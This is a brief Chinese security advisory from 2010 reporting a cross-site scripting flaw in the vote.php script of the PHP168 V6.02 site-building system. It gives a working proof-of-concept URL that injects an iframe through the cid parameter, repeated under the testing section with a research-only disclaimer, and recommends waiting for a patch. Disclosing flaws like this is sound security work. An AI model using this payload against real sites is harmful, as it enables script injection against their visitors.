PHP168 V6.02 vote.php存在跨站漏洞

来源:岁月联盟 编辑:猪蛋儿 时间:2010-05-04

影响版本:
PHP168 V6.02

洞描述:
PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用。

跨站demo: http://v6.php168.com/do/vote.php?job=show&cid=%22%3E%3Ciframe%20src=http://www.syue.com%3E

<*参考

*>

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/do/vote.php?job=show&cid=%22%3E%3Ciframe%20src=http://www.syue.com%3ESEBUG

安全建议:
等待补丁